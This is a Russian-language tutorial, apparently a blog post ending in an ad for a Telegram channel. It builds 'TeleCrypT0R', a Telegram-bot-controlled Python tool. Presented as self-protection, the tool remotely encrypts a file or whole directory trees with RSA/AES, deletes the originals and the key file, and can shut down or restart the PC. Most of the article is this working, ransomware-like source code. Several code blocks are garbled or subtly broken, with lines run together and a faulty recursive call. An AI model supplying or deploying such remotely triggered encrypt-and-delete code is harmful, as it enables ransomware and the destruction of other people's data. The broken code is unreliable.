Давайте на очень простом примере попробуем улучшить нашу безопасность, а заодно и разберемся с шифрованием в Python.

Каждый человек, который пользуется компьютером или смартфоном, ежедневно сталкивается с криптографией: начиная от работы в интернете по протоколу HTTPS и заканчивая печально известными вирусами-шифровальщиками. Однако далеко не все понимают, как работает криптография. Давайте попробуем в этом разобраться на конкретном примере.

Википедия гласит:

Криптогра́фия (от др.-греч. κρυπτός — скрытый и γράφω — пишу) — наука о методах обеспечения конфиденциальности (невозможности прочтения информации посторонним), целостности данных (невозможности незаметного изменения информации), аутентификации (проверки подлинности авторства или иных свойств объекта), а также невозможности отказа от авторства.

Одним из разделов криптографии является наука о шифровании. В процессе шифрования происходит обратимое изменение информации с помощью некоего секрета, что делает информацию недоступной для тех, кто секретом не владеет. Базовые принципы шифрования мы и рассмотрим в этой статье.

Если вам не хочется разбираться в коде, вот ссылка на репозиторий с TeleCrypTOR:

https://github.com/f4rber/TeleCrypT0R

Теперь перейдем непосредственно к коду и его работе

Сегодня мы будем использовать модуль cryptography для создания ключа и шифрования файлов, pyTelegramBotApi для создания бота Cryptodome для RSA шифрования.

pip install pyTelegramBotAPI
pip install cryptography
pip install pycryptodome 
Если вы используете Windows, то pip install pucryptodomex

Создание ключа

Создаем файл GenerateKey.py и пишем туда следующее:

from cryptography.fernet import Fernet  # Импортируем библиотеку для генерации ключей

logo = r'''
▄ •▄ ▄▄▄ . ▄· ▄▌     ▄▄ • ▄▄▄ . ▐ ▄ ▄▄▄ .▄▄▄   ▄▄▄· ▄▄▄▄▄      ▄▄▄  
█▌▄▌▪▀▄.▀·▐█▪██▌    ▐█ ▀ ▪▀▄.▀·•█▌▐█▀▄.▀·▀▄ █·▐█ ▀█ •██  ▪     ▀▄ █·
▐▀▀▄·▐▀▀▪▄▐█▌▐█▪    ▄█ ▀█▄▐▀▀▪▄▐█▐▐▌▐▀▀▪▄▐▀▀▄ ▄█▀▀█  ▐█.▪ ▄█▀▄ ▐▀▀▄ 
▐█.█▌▐█▄▄▌ ▐█▀·.    ▐█▄▪▐█▐█▄▄▌██▐█▌▐█▄▄▌▐█•█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
·▀  ▀ ▀▀▀   ▀ •     ·▀▀▀▀  ▀▀▀ ▀▀ █▪ ▀▀▀ .▀  ▀ ▀  ▀  ▀▀▀  ▀█▄▀▪.▀  ▀                                                                  
'''

print(logo)  # Выводим на экран логотип

Сделаем try/catch для того, что бы в случае возникновения ошибки, программа нам об этом сообщила:

try:
    key = Fernet.generate_key()  # Переменная с ключём

    file = open('key.key', 'wb')  # Открываем файл / Open file
    file.write(key)  # Записываем ключ в файл / Write key to the file
    file.close()  # Закрываем файл / Close the file

    # Если всё прошло успешно пишем что ключ сгенерирован
    # If everything is ok print message
    print("KEY GENERATED SUCCESSFULLY")

except Exception as ex:
    # Если что-то пошло не так пишем сообщение
    # If something goes wrong print message
    print("KEY WASN`T GENERATED SUCCESSFULLY\n" + str(ex))

except Exception as ex – создаем переменную в которой содержиться сообщение об ошибке (если она будет), в дальнейшем мы выводим его в print(“…” + str(ex)), str() нужен для конвертации ex в строку. Теперь нужно написать генератор ключей для AES шифрования:

try:
    key = RSA.generate(2048)  # Переменная с приватным ключём
    private_key = key.export_key()  # Экспортируем ключ
    file_out = open("private.pem", "wb")  # Название файла
    file_out.write(private_key)  # Записываем в файл
    print("private_key generated")

    public_key = key.publickey().export_key()  # Переменная с публичным ключём
    file_out = open("receiver.pem", "wb")  # Название файла
    file_out.write(public_key)  # Записываем в файл
    print("public_key generated")
except Exception as ex:
    print("KEY WASN`T GENERATED SUCCESSFULLY\n" + str(ex))

Приватный ключ нужно сохранить на флешку! Им мы будем расшифровывать файлы, такая “система” надежнее чем первый вариант в разы.

Теперь запускаем наш файл:

python3 GenerateKey.py

Если вы увидели строку KEY GENERATED SUCCESSFULLY, значит файл с ключём сгенерировался и теперь вам нужно скопировать его на флешку или же отдать доверенному лицу, что бы в дальнейшем расшифровать файлы.

Создание Телеграм бота

Прежде чем начинать разработку, бота необходимо зарегистрировать и получить его уникальный id, являющийся одновременно и токеном. Для этого в Telegram существует специальный бот — @BotFather.

Пишем ему /start и получаем список всех его команд.

Первая и главная — /newbot — отправляем ему и бот просит придумать имя нашему новому боту. Единственное ограничение на имя — оно должно оканчиваться на «bot». В случае успеха BotFather возвращает токен бота и ссылку для быстрого добавления бота в контакты, иначе придется поломать голову над именем.

Для начала работы этого уже достаточно. Особо педантичные могут уже здесь присвоить боту аватар, описание и приветственное сообщение.

Начинаем разработку

Импортируем библиотеки:

# Для АЕS шифрования
from Cryptodome.PublicKey import RSA
from Cryptodome.Random import get_random_bytes
from Cryptodome.Cipher import AES, PKCS1_OAEP
# Для удаления файлов, списка файлов, перезапуска/выключения компьютера
from os import path, remove, listdir, system
# Для создания бота
import telebot
# Для шифрования файла первым способом
from cryptography.fernet import Fernet

Время создать переменные в которых будет содержаться название файла и ключ(удалиться после зашифровки файла, так что код можно назвать “последним шансом”):

input_file = ''   # Файл для шифрования. Лучше всего использовать zip или rar, что бы зашифровать не 1 файл, а архив файлов
output_file = 'file.encrypted'  # Файл который мы получаем на выходе

key_file = open('key.key', 'rb')  # Открываем файл с ключём для чтения
key = key_file.read()  # Читаем содержимое файла с ключём
key_file.close()  # Зыкрываем файл с ключём

bot_token = "your_token"  # Токен бота, получаем у @BotFather
chat_id = "Your_id"  # Наш айди, получаем у @userinfobot
bot = telebot.TeleBot(bot_token)

bot.send_message(chat_id, "Bot started successfully!")# Бот отправит сообщение, "Bot started successfully!"

Приступим к написанию команд

Крепить команды к боту будем через @bot.message_handler.

/start

# /start
@bot.message_handler(commands=['start', 'Start'])  # Указываем с чего должна начинаться команда 
def start(message):
    bot.send_message(chat_id, "Telegram CrypT0R by F4RB3R" + "\n\nUse /help to see commands") 

Если мы напишем боту /start, он отправит нам сообщение:

Telegram CrypT0R by F4RB3R

/help to see commands

/help

# Initiate command /help
@bot.message_handler(commands=['help', 'commands', 'Help', 'Commands'])
def send_help(message):
    help_info = r'''
------------------------------
<Welcome to Help>
------------------------------
Bot Commands:
[01] Start
[ /] /start
[02] Help.
[ /] /help
[03] Encrypting one file.
[ /] /encryptone
[03] Encrypting all data.
[ /] /encryptall
[04] Shutdown PC.
[ /] /shutdown
[05] Restart PC.
[ /] /restart
------------------------------
<Created by F4RB3R>
------------------------------
'''
    bot.send_message(chat_id, help_info)

/restart и /shutdown

# Initiate command /shutdown
@bot.message_handler(commands=["shutdown", "/shutdown", "/Shutdown"])
def shutdown(self):
    bot.send_message(chat_id, "Shutdown Successfully!")
    system("shutdown /s /t 1")  # Выключение компьютера (/s обозначает выключение, /t время до действия)


# Initiate command /restart
@bot.message_handler(commands=["restart", "/restart", "/Restart"])
def restart(self):
    bot.send_message(chat_id, "Restart Successfully!")
    system("shutdown /r /t 1")  # Перезагрузка компьютера (/r обозначает перезапуск, /t время до действия)

/encryptone

# /encryptone - шифрует один файл, путь к файлу мы указывали выше
@bot.message_handler(commands=["encryptone", "/encryptone"])
def encrypt(self):
    try:
        with open(input_file, 'rb') as f:
            data = f.read()  # Читаем исходный файл 

        fernet = Fernet(key)  # Переменная с ключём для шифрования 
        encrypted = fernet.encrypt(data)  # Зашифровываем файл 

        with open(output_file, 'wb') as f:
            f.write(encrypted)  # Записываем информацию в зашифрованный файл
        remove(input_file)  # Удаляем исходный файл 
        remove("key.key")  # Удаляем файл с ключём 
    except Exception as ex:  # Бот отправит нам сообщение с ошибкой (если она будет)
        bot.send_message(chat_id, "Something went wrong!\n" + str(ex))

Теперь самое интересное, зашифровывание всех файлов в папке: /encryptall

# /encryptall
@bot.message_handler(commands=["encryptgall", "/encryptall"])
def encrypt(self):
  try:
        def crypt(file):
            f = open(file, "rb")
            data = f.read()
            f.close()

            file_out = open(str(file) + ".bin", "wb")

            recipient_key = RSA.import_key(open('receiver.pem').read())
            session_key = get_random_bytes(16)

            cipher_rsa = PKCS1_OAEP.new(recipient_key)
            enc_session_key = cipher_rsa.encrypt(session_key)

            cipher_aes = AES.new(session_key, AES.MODE_EAX)
            ciphertext, tag = cipher_aes.encrypt_and_digest(data)

            

[file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext)]

print(file + ” Encoded”) remove(file) def walk(dir): for name in listdir(dir): path_to_file = path.join(dir, name) if path.isfile(path_to_file): crypt(path_to_file) else: walk(path) walk(“C:/Users/User/Desktop/Python_Projects/CrypT0R/aa/”) # Функция смотрит папку аа и шифрует все файлы которые там найдет, вы должны будете указать путь к своей директории, думаю это не нужно объянсять. bot.send_message(chat_id, “Successfully encrypted”) except Exception as ex: # Бот отправит нам сообщение с ошибкой bot.send_message(chat_id, “Something went wrong!\n” + str(ex))

Поскольку мы хотим иметь возможность шифровать произвольный объем данных, мы используем гибридную схему шифрования. Мы используем RSA с PKCS # 1 OAEP для асимметричного шифрования сеансового ключа AES. Затем ключ сеанса может быть использован для шифрования всех фактических данных.

Функция walk(dir) будет “ходить” по указанной папке и смотреть есть ли там файлы, так же, она будет просматривать и другие папки в указанном пути.

В самом конце программы мы добавляем:

bot.polling()

Теперь настало время для дешифрования

Для первого алгоритма:

from cryptography.fernet import Fernet
key_file = open('key.key', 'rb')  # Открываем файл с ключём для чтения 
key = key_file.read()  # Читаем содержимое файла с ключём
key_file.close()  # Зыкрываем файл с ключём
input_file = 'test.encrypted'  # Входной файл
output_file = 'test.txt'  # Дешифрованный файл

with open(input_file, 'rb') as f:
    data = f.read()  # Читаем входной файл

fernet = Fernet(key)  # Переменная с ключём для шифрования

encrypted = fernet.decrypt(data)  # Функция для дешифрования

with open(output_file, 'wb') as f:
    f.write(encrypted)  # Записываем дешифрованный файл

# input_file так же останется после всех манипуляций

Для второго алгоритма:

Вам нужен будет private_key который мы генерировали в начале.

from Cryptodome.PublicKey import RSA
from Cryptodome.Random import get_random_bytes
from Cryptodome.Cipher import AES, PKCS1_OAEP
import os


def decrypt(file):
    file_in = open(file, "rb")
    file_out = open(str(file[:-4]), "wb")
    private_key = RSA.import_key(open("private.pem").read())

    enc_session_key, nonce, tag, ciphertext = \
    

[file_in.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1)]

# Decrypt the session key with the private RSA key cipher_rsa = PKCS1_OAEP.new(private_key) session_key = cipher_rsa.decrypt(enc_session_key) # Decrypt the data with the AES session key cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce) data = cipher_aes.decrypt_and_verify(ciphertext, tag) file_out.write(data) print(data.decode(“utf-8″) + file + ” DECODED”) def walk(dir): for name in os.listdir(dir): path = os.path.join(dir, name) if os.path.isfile(path): decrypt(path) else: walk(path) walk(“your directory”) # Папка с вашими зашифрованными файлами

На последок немного сриншотов:

Подведем Итоги

В данной статье мы изрядно прошлись по поверхности вопроса : «Как, и что делать с пакетами PyCryptodome и cryptography?». Мы рассмотрели всего пару вариантов применения данных пакетов в шифровании и расшифровке файлов. Убедитесь в том, что уделите время документации, перед тем как начать экспериментировать с изложенной в данной статье информацией.

Вас ебали, ебут и будут ебать. Государство, хакеры, чиновники.

Остановить эту свингер-пати невозможно. Но я научу предохраняться. Я покажу и расскажу вам то о чём не пишет журнал “Хакер” и не рассказывают или просто не знают другие каналы. Здесь ты найдешь подборку лучших статей и видеоматериалов на тему кибербезопасности. Все, от аудита Wi-Fi до вскрытия автомобилей (если вы потеряли ключи). А также горячие новости с авторскими коментариями.

Обо всем этом вам расскажу только я на канале @cybersecs